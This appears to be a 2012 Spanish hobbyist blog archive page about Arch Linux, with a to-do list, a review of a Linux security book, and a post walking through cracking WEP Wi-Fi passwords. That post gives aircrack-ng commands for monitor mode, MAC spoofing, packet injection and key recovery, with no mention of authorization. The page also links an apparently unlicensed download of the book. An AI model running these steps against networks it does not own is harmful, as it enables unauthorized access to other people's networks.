Archivo para 11 junio 2012

ToDo in myArchLinux

Y además:

  • Detector de modo promiscuo en la red
  • Envío de correo por avisos de logins erroneos, etc.
  • Instalar un shell interactivo.
  • Tethering
  • Detector de temperaturas, mas display USB, usando LCD4Linux…y a falta de display LCD4Linux tiene un driver para Text(Curses). LCD4Linux + LCD4Linux Display Text(Curses)
  • Crear par de claves PGP
  • Instalar: cliente de correo(Sylpheed, sylpheed claws or mutt muttng), cliente IRC…mas información https://bbs.archlinux.org/viewtopic.php?id=88515
Anuncios

Ataque básico WEP

Image

 

Aunque ya casi esta anticuado este tipo de ataque, siguen quedando Wifis con seguridad WEP. Los pasos para conseguir el password de este tipos de puntos de accesos son:

#Ponemos tarjeta en modo promiscuo
$ sudo airmon-ng start wlan0

#Cambiamos MAC de nuestra tarjeta 
$ sudo ifconfig mon0 down
$ sudo macchanger -m 00:11:22:33:44:55 mon0
$ sudo ifconfig mon0 up

#Escaneamos las redes que están a nuestro alcance
$ sudo airodump-ng mon0

#Volcamos el tráfico de red
$ sudo airodump-ng -c [CH] -w [ESSID] --bssid [BSSID] mon0

#Inyectamos tráficos para capturar mas paquetes
$ sudo aireplay-ng -1 6000 -a [BSSID] -h 00:11:22:33:44:55 mon0
$ sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [BSSID] -h 00:11:22:33:44:55 mon0

#Ponemos a descifrar la clave con los paquetes capturados
$ sudo aircrack-ng -z [ESSID]*.cap

La información de esta entrada a sido extraida del blog:
http://elblogdepicodev.blogspot.com.es/2012/05/obtener-la-clave-de-una-red-wifi-wep.html
via
http://planeta.archlinux-es.org/
via
https://planet.archlinux.org/

Linux Máxima seguridad

Buenas a todos,

Esta entrada la voy a dedicar al famoso libro Linux Máxima Seguridad de anónimo.

Desde que cayó este libro en mis manos mis conocimientos en seguridad Linux han aumentado considerablemente. Explicando los temas de manera sencilla, pero incluyendo la base de todo lo que explica para comprenderlo bien, y con ejemplos de código y aplicaciones que llevan a cabo el tema que se está tratando en el capitulo, hasta casos reales que han explotado los agujeros de seguridad de que se están hablando.

No se si se ha ido actualizando el libro, pero la versión que tengo hay algunos programas desactulizados. Por lo que he tenido que ir buscando el equivalente actual para la distribución Arch Linux. Estos son:

Defensa:

  • AIDE: aide is an intrusion detection system for checking the integrity of files.
  • SNORT
  • iptables

Ataque:

  • NMAP
  • WIRESHARK(Ether)
  • MACCHANGER
  • NESSUS

Adjunto enlace a ZIP con el libro tal como me lo baje en su día.

Download/Descargar